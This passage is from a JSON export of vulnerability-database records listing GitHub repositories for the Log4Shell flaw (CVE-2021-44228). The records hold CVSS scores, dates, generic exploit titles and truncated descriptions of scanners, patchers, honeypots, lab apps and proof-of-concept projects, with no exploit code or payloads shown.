"AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T21:08:41", "description": "# Log4j CVE-2021-44228 checker\n\nMultithreaded checks a list of U...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T18:57:05", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-13T18:45:25", "id": "6CC29A1A-24F4-5961-89F9-E7B824C6F37C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-15T14:07:08", "description": "![Logpresso Logo](logo.png)\n\nlog4j2-scan is a single binary comm...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-14T17:53:37", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-14T17:58:15", "id": "5E9FB294-1E29-5DE8-A6F6-6D25B08A31DC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-12T14:41:41", "description": "# Get-log4j-Windows.ps1\n \n Identify all log4j components across...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T10:49:36", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-12T12:25:17", "id": "F208D311-79CA-5A2C-AE81-591BA4D30750", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-19T11:58:05", "description": "# CVE-2021-44228\n\n[![Dockerfile](https://github.com/ahmad4fifz/C...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T12:30:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-05T08:46:03", "id": "2A95146E-A404-5015-9D39-293C8EAFF4B6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-21T05:08:10", "description": "# Log4j Vulnerability - Proof-of-concept\n\nThis repo has the dock...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T19:50:40", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-21T02:11:16", "id": "6F93E170-75AD-5F5C-B7CC-6C4CEAA695AB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T20:20:44", "description": "# This is an example of exploiting [CVE-2021-44228](https://gith...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T17:13:18", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-17T17:16:32", "id": "EB648301-A198-5E4A-A72E-9639ED09F6C9", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-24T09:16:38", "description": "# SnapAttack Log4j / CVE-2021-44228 / log4shell Resources\n\n## Wh...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-20T18:51:52", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T04:19:34", "id": "AE0FE928-3464-53AA-BBD2-B3F9E871CEDD", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-26T11:44:23", "description": "# Log4jUnifi\nExploiting CVE-2021-44228 in Unifi Network Applicat...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-24T13:18:49", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-26T09:43:23", "id": "D64C04EA-093F-5924-A39B-714908D4637E", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-23T08:10:52", "description": "# Log4Shell POC Demo\n\nThis repository contains a submodule, clon...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-17T04:20:40", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-23T05:33:16", "id": "D5003B3C-B1D9-5840-816F-1AFEBCAC7FD3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-23T10:06:18", "description": "# Log4j 2 CVE-2021-44228 \u6d4b\u8bd5\u6837\u672c\u5e94\u7528\n\n\u57fa\u4e8e spring-boot-starter-log4j2:2...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T15:18:42", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-23T06:42:48", "id": "9FE4ADCA-7F2C-505F-AE74-C635FF2CDF75", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:13:51", "description": "# Log4J lab\n\n### Description\nThis is a lab ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-13T08:13:07", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-13T22:42:03", "id": "2EACBFB9-2956-564B-A859-6C85EF9F785A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-25T16:15:54", "description": "# log4j-poc\n\n## An LDAP RCE exploit for CVE-2021-44228 Log4Shell...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T21:45:33", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-25T14:53:26", "id": "44DBFE24-1B30-510A-8291-B7043C7FF654", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-20T12:15:27", "description": "# Log4j-CVE-2021-44228\n<img src=\"2021-12-13_20-41.png\">\n\nMass Ch...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T13:30:57", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-20T08:59:22", "id": "1E085D9B-26F5-5960-938C-AEB76BCE61D8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-14T17:17:14", "description": "# log4j-vulnerability-patcher-agent\n\nThis agent fixes critical v...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-11T07:16:21", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-11T11:09:42", "id": "27D73012-7283-5C8D-8197-BBAE1964DEE3", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T11:18:09", "description": "# log4shell-honeypot\nCatch and download `log4shell` payloads sen...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-12-15T16:29:37", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-16T09:56:45", "id": "32BB43C3-F80D-5CBF-83AD-55BD38C2A440", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-06-27T18:01:50", "description": "<h1 align=\"center\">\n <a href=\"https://github.com/0xDexter0us/Lo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T11:06:46", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-06-27T10:34:49", "id": "45E71437-8181-5EB7-91BD-D6E4343DA0AB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-26T13:53:22", "description": "# f5-waf-enforce-sigs-CVE-2021-44228\nThis enforces signatures fo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T21:59:19", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T22:21:51", "id": "DA01F84A-9B1D-5337-A465-2A9AB088C056", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-18T14:09:25", "description": "# Spring Boot Log4j - CVE-2021-44228\n\nThe Log4Shell vulnerabilit...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T12:50:28", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2021-12-18T12:50:40", "id": "C7EE8D86-B287-50F5-B8C2-05E11E510900", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "[![Download](https://img.shields.io/github/v/release/rakutentech...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-11T03:08:14", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-06T08:21:03", "id": "9E4C737D-2D3C-5A43-B638-E131903225BC", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-18T14:08:54", "description": "# Log4Shell sample vulnerable application (CVE-2021-44228)\n\nThis...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-18T12:50:04", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", 